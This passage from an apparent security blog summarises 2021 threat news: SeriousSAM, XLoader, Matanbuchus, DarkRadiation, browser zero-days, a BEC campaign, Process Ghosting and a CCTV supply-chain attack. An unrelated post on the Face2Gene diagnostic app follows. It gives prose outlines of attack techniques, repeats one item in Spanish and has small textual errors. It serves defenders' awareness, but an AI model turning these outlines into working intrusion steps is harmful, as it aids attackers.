tends to use the same C2 infrastructure for several weeks or months; in fact, in six months, Proofpoint has identified only three domains that would act as C2. More info: https://www.proofpoint.com/us/blog/threat-insight/new-threat-actor-uses-spanish-language-lures-distribute-seldom-observed-bandook SeriousSAM: Privilege escalation vulnerability in Windows 10 Security researcher Jonas Lyk, along with other experts, has discovered a vulnerability in Windows 10 that would allow threat actors to escalate privileges to access hashed user account passwords and important system configuration details. The flaw, named SeriousSAM (CVE-2021-36934), lies in the way Windows 10 controls access to directories such as SAM, SECURITY and SYSTEM (within C:Windows System32) since Windows 10 v1809. In these versions, Microsoft fails to restrict access to these configuration files in the backups generated by the Windows Shadow Volume Copy functionality. Microsoft has not yet released security patches or mitigations for this vulnerability. However, it has shared a workaround while it continues to investigate this security flaw. Meanwhile, some tips for system administrators and security providers on how to log and monitor access to SAM data have been posted on Reddit. In addition, Kevin Beaumont has published a proof of concept that would allow system administrators to test which of their systems are vulnerable to these attacks. Finally, US-CERT has also published a briefing note on the flaw. Learn more: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934 XLoader: Formbook variant for Windows and MacOS Researchers at CheckPoint have published a report on the XLoader malware, a variant of the Formbook malware. According to the research, a new malware called XLoader, which advertises itself as a cross-platform botnet and is capable of stealing information on Windows and MacOS systems, has recently been detected in underground forums. This new variant is known to have emerged in February 2021 and is an evolution of the well-known Formbook, a stealer that is still prevalent five years after its activation and would target Windows machines. XLoader is a much more sophisticated malware than Formbook, with the ability to collect credentials from web browsers and some email clients, take screenshots, log keystrokes and execute other types of malware. It is a Malware-as-a-Service where customers can rent the macOS version and the vendor provides them with access to a server that would allow them to manage the compromised devices. In this way, the attackers also maintain control over their customers' use of the tool. Finally, it is worth noting that most of XLoader's victims are located in the US. More details: https://research.checkpoint.com/2021/top-prevalent-malware-with-a-thousand-campaigns-migrates-to-macos/

SonicWall fixes a critical vulnerability that had been partially fixed In October last year, SonicWall fixed a critical buffer overflow vulnerability in SonicOS under the identifier CVE-2020-5135, which affected more than 800,000 SonicWall VPN devices. This flaw allowed unauthenticated attackers to remotely execute code on the affected device or cause a denial of service by sending specifically crafted HTTP requests to the firewall. However, security researcher Craig Young now reveals that this patch left uncorrected a memory information exposure flaw, which has been identified as CVE-2021-20019 and had not been fixed until the most recent release of SonicOS. More info: https://www.tripwire.com/state-of-security/featured/analyzing-sonicwalls-unsuccessful-fix-for-cve-2020-5135/ Zyxel alerts its customers of attacks against their devices Zyxel has alerted customers via email about a series of attacks targeting VPN systems, firewalls and load balancers that the company offers and that have SSL-VPN-enabled remote management. Specifically, these attacks are said to target USG, ZyWALL, USG FLEX, ATP and VPN series network devices running the ZLD firmware on-premises. According to Zyxel, the attacker tries to access the device via WAN and if successful, attempts to bypass authentication systems and establish a VPN connection through an SSL tunnel with an unknown use a VPN connection through an SSL tunnel with an unknown user ((e.g. "zyxel_slIvpn", "zyxel_ts", "zyxel_vpn_test") to manipulate the device's configuration. At this stage, it is not known whether the input vector for these attacks is an old vulnerability present in unpatched devices is or whether it is a new 0-day vulnerability. Nevertheless, Zytel has shared a number of mitigation measures against this threat. All the details: https://therecord.media/zyxel-says-a-threat-actor-is-targeting-its-enterprise-firewall-and-vpn-devices/ Matanbuchus: new Malware-as-a-Service Researchers at Unit 42 in Palo Alto have published details of a new Malware-as-a-Service (Maas) called Matanbuchus Loader. This MaaS was first spotted in February this year on underground forums linked to BelailDemon threat actor, who set a price of $2500 for its acquisition. The initial distribution vector for the artifact is an Excel document with malicious macros, which will execute a file downloaded from an external domain. Matanbuchus has multiple capabilities such as running .exe or .dll files in memory, leveraging the schtasks.exe scheduled task service for persistence, running PowerShell commands or using system executables to load DLL libraries. Palo Alto has identified several organisations affected by this malware in the US and Belgium. Learn more: https://unit42.paloaltonetworks.com/matanbuchus-malware-as-a-service/ DarkRadiation: New ransomware targeting GNU/Linux systems with worm-like functionality Trend Micro researchers have analysed the functioning of a recently discovered ransomware, which has been named DarkRadiation and targets GNU/Linux systems. It is fully implemented in Bash and most of its components target Red Hat and CentOS distributions, including to a lesser extent Debian-based distributions. This ransomware uses the Telegram API for communication with the C&C server and has worm-like functionality via SSH protocol. To evade detection it makes use of the open source obfuscation tool "node-bash-ofuscate", with which the attackers obtain zero detections in VirusTotal. Researchers have observed that this ransomware is in continuous development, with multiple versions belonging to different campaigns. More details: https://www.trendmicro.com/en_us/research/21/f/bash-ransomware-darkradiation-targets-red-hat--and-debian-based-linux-distributions.html

0-day vulnerability in Chrome, the seventh so far this year Yesterday, June 17, Google released version 91.0.4472.114 of Chrome for Windows, Mac and Linux, resolving a 0-day vulnerability classified as CVE-2021-30554. The exploitation of this flaw could lead to arbitrary code execution on systems running unsecured versions of Chrome. For its part, Google has not disclosed any further information about the security issue awaiting most users to update their browsers. This type of 0-day vulnerability has recently been exploited by the PuzzleMaker threat actor in order to exceed the browser's framework and install malware on Windows systems. Additionally, the update has addressed three other serious browser vulnerabilities, affecting the Chrome Sharing, WebAudio and TabGroups components, which have been identified as CVE-2021-30555, CVE-2021-30556 and CVE-2021-30557. https://chromereleases.googleblog.com/2021/06/stable-channel-update-for-desktop_17.html 0-day vulnerabilities in Apple Apple has issued security updates to address two 0-day vulnerabilities affecting its iOS 12 mobile operating system. The fixed flaws, listed as CVE-2021-30761 and CVE-2021-30762, are due to issues in the WebKit browser engine and could allow an attacker to execute arbitrary code when processing specially crafted malicious web content. The firm warns that these vulnerabilities are being actively exploited. The security update also addresses a memory corruption issue in the ASN.1 decoder, listed as CVE-2021-30737, which would allow remote code execution. The devices affected by these flaws are iPhone 5s, iPhone 6s, iPhone 6 Plus, iPad Air, iPad mini 2, iPad mini 3 and iPod touch (6th generation), all of which are patched with iOS version 12.5.4 https://support.apple.com/en-us/HT212548 Microsoft stops a high-impact BEC operation The Microsoft 365 Defender research team together with the Microsoft Threat Intelligence Centre (MSTIC) have discovered and disrupted the infrastructure of a large-scale BEC operation. In their analysis, they expose that threat actors were exploiting various cloud-hosted web services to compromise email inboxes and add forwarding rules using different IPs, and adding time latency between actions in order to go undetected by security systems. To gain initial access to the victim's host they would have exfiltrated credentials obtained through social engineering techniques, sending phishing emails where they would attach an HTML containing a JavaScript, to pretend to be a Microsoft login. Once the user's credentials were compromised, they would access their mailbox and add forwarding rules with parameters such as "invoice", "payment" or "statement", which allowed them to access financial information, as well as having a persistent information exfiltration channel. They also allegedly created rules to delete mails that were forwarded to their infrastructure, adding complexity to the detection of their operations. https://www.microsoft.com/security/blog/2021/06/14/behind-the-scenes-of-business-email-compromise-using-cross-domain-threat-data-to-disrupt-a-large-bec-infrastructure/ New malware evasion technique Security researchers at Elastic have made public a new executable image manipulation technique, called "Process Ghosting", which could be used by attackers to evade protections and stealthily execute malicious code on Windows. With this new technique, a threat actor could insert a malware component on the victim computer's disk in a way that makes it difficult to detect. Such evasion takes advantage of the time lag from the creation of a process until the device's security systems are notified of its creation, giving attackers a window to evade detection. The flow of the Process Ghosting attack would start by creating a file, changing its status to "delete-pending", thus preventing access and reading, then assigning an image for the file on disk after inserting the malicious code and finally deleting it. The next step would be to create a process with the relevant environment variables, which would call a thread for execution. It is important to note that the success of this attack is due to the fact that calls from security systems, such as antivirus, are made when the thread is created, which will try to read an already deleted file, therefore bypassing security. https://www.elastic.co/es/blog/process-ghosting-a-new-executable-image-tampering-attack Ataque a la cadena de suministro de un proveedor de CCTV El equipo de Mandiant de FireEye ha publicado una investigación acerca de un nuevo ataque a la cadena de suministro. Los atacantes de este incidente, que han sido identificados como UNC2465, un grupo afiliado al ransomware DarkSide, habrían vulnerado un sitio web legítimo de un proveedor de cámaras de circuito cerrado de televisión (CCTV), y habrían implantado un troyano dentro de un instalador PVR de cámara de seguridad que los usuarios descargaban para configurar y controlar sus dispositivos de seguridad. Con la instalación del software malicioso también se iniciaba la descarga del troyano Smokedham o Beacon, entre otros. Los investigadores no detectaron la presencia del ransomware Darkside en las redes de las víctimas debido, principalmente, a que esta intrusión tuvo lugar entre el 18 de mayo y principios del mes de junio, y para ese momento, Darkside ya había anunciado el cierre de su actividad tras el ataque a Colonial Pipeline. Attack on CCTV provider's supply chain FireEye's Mandiant team has published an investigation into a new supply chain attack. The attackers in this incident, who have been identified as UNC2465, a group affiliated with the DarkSide ransomware. The attackers breached a legitimate website of a closed-circuit television (CCTV) camera vendor, and deployed a trojan inside a security camera PVR installer that users downloaded to condiv and control their security devices. The installation of the malware also initiated the download of the Smokedham or Beacon trojan, among others. The researchers did not detect the presence of Darkside ransomware on the victims' networks mainly because this intrusion took place between 18 May and early June, and by this time Darkside had already announced it was ceasing its activity after the Colonial Pipeline attack. https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html Critical vulnerability in ThroughTek supply chain The US Cybersecurity and Infrastructure Security Agency (CISA) has issued a warning regarding a critical software supply chain flaw affecting ThroughTek's software development kit (SDK). Successful exploitation of this vulnerability could allow unauthorised access to sensitive information, such as audio/video streams from security cameras. The flaw, listed as CVE-2021-32934 and with a CVSS score of 9.1, affects ThroughTek P2P products with versions 3.1.5 and earlier, as well as versions with the nossl tag and various firmware configurations. https://us-cert.cisa.gov/ics/advisories/icsa-21-166-01

Did you know that Machine Learning is already being used to help doctors identify rare genetic disorders by analysing images of people´s faces? The quantity of genetic illnesses is so overwhelming that in some cases it’s difficult to reach a definite diagnosis because, although each one has varied characteristics that differentiate them form one another, a lot of the time the symptoms present themselves in a similar way. A magazine Nature Medicine has just published an article about an app for smartphones, Face2Gene, that is capable of identifying different facial features in photos that are derivative of certain genetic and neurological disorders. This technology analyses the patient photo using descriptive facial mathematics that are shared with the gestalt of different syndromes. It then quantifies their similarity and offers a prioritised list of syndromes with a similar morphology. Face2Gene was created by the FDNA, one of the leading companies in artificial intelligence applications for genetic diagnosis. Their initial objective was to create an app that was capable of identifying syndromes such as Angelmann, Noonan and Cornelia de Lange, three rare genetic disorders with distinct facial characteristics. Figure 2. Source: FDNA To do this, they fed the algorithm more than 17,000 images of diagnosed cases that included 216 different syndromes, which resulted in exceptional diagnosis results. This app does not pretend to provide definitive diagnoses. Doctors use it for a second opinion or even as a point of reference when they don’t know how to interpret a patient’s symptoms involving rare genetic disorders. Figure 3. Source: FDNA Thus, Artificial Intelligence acts as a way of achieving a more accurate diagnosis, a way of saving time, and as a way of saving costs associated with ´amplified range´ genetic testing that will no longer be a necessary means of radically limiting the list of possible diagnoses. In order for Face2Gene to be able to offer strong diagnoses, it needs data. The good news is that health professionals agreed to upload patient photos to the application (that now has over 150,000 available images on its database), which has improved the programs precision. Figure 4. Source: FDNA It´s fundamentally important that a lot of data is shared in order to avoid racial biases and to achieve a balanced representation of different populations so people all around the world can be treated. Early diagnosis is crucial for these types of illnesses. It is amazing to think that one day soon we may hear that paediatricians and geneticists are able to use these kinds of apps with the same ease with which they use their stethoscope. You can also follow us on Twitter, YouTube and LinkedIn